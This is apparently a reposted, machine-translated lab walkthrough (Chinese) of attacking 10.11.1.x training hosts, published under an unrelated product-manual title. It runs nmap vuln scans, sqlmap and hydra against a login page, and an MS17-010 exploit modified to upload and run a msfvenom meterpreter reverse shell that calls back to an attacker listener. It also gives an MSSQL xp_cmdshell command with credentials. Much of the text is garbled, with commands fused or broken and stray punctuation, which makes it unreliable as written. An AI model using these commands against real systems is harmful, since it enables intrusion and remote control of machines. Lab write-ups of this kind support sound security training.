首页 > 编程知识 正文

gp4501tw使用说明书,靶机设备

时间:2023-05-06 14:11:10 阅读:170168 作者:702

nmap-T4-a-ss-SV-vv-- script vuln-p---open-n-pn 10.11.1.31-ox 10.11.1.31.XML

xlt proc-o 10.11.1.31.html 10.11.1.31.XML

sqlmap-u ' http://10.11.1.31/log in-off.ASP '-- data=' txtlog inid=' amdintxtpassword=1cmd submit=log in '---- log in

hydra-luser.txt-ppass.txt-s 8010.11.1.31 http-post-form '/log in-off.ASP 3360 txtlog inid=^ user ^ txt PPPs

git clone https://github.com/worawit/ms17-010 /

光盘桌面/ms17-010 /

python checker.py 10.11.1.5

在netlogon中,状态为OK表示存在漏洞。

MSF venom-p windows/meter preter/reverse _ tcpl host=10.11.0.243 lport=4444-fexe-o/tmp/1.exe

打开元数据打印

useexploit/multi/handler

Show payload

setpayloadwindows/meter preter/reverse _ TCP

setlhost10.11.0.243

setlport4444

导出

jobs请勿关闭msf的控制台

然后返回/MS17-010/文件夹,修改zzz_exploit.py文件中的代码。

leafpadzzz_exploit.py

搜索SMB_PWN(Conn,arch )

注释行: print (creating filec : (pwned.txtonthetarget ) ) )。

TID2=SMBConn.connecttree('c$ ' ) )。

FID2=SMBConn.createfile(tid2,'/pwned.txt ' ) ) ) ) ) ) ) ) )。

SMBConn.closefile(TID2,fid2) )。

SMBConn.disconnecttree(tid2) )。

取消对这几行的注释。 ((盖) ) ) ) )。

SMB_send_file(SMBconn,'/tmp/1.exe ',' c ','/1.exe ' ) )

service_exec(Conn,r'cmd/cc:((1.exe ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) )。

本地kali机器上的1.exe记得打开777权限。 否则,无法连接到靶机。

python zzz _ exploit.py 10.11.1.5 NetLogon (可删除的netlogon ) ) )。

sessions验证是否已建立l会话

sssions-I1(id )链接会话getuidps

如果光盘“ documentsandsettingsadministratordesktop”路径中间有空格,则必须用双引号引起来

cat proof.txt

26 b4cb 0930 a3 e3be 4d a8e 9d 738607427

nmap-p 1433-- script=ms-SQL-XP-cmdshell.NSE-- script-args MSSQL.username=sa,MSSQL.password=poiuyt rewew

然后登录桌面查看proof.txt

版权声明:该文观点仅代表作者本人。处理文章:请发送邮件至 三1五14八八95#扣扣.com 举报,一经查实,本站将立刻删除。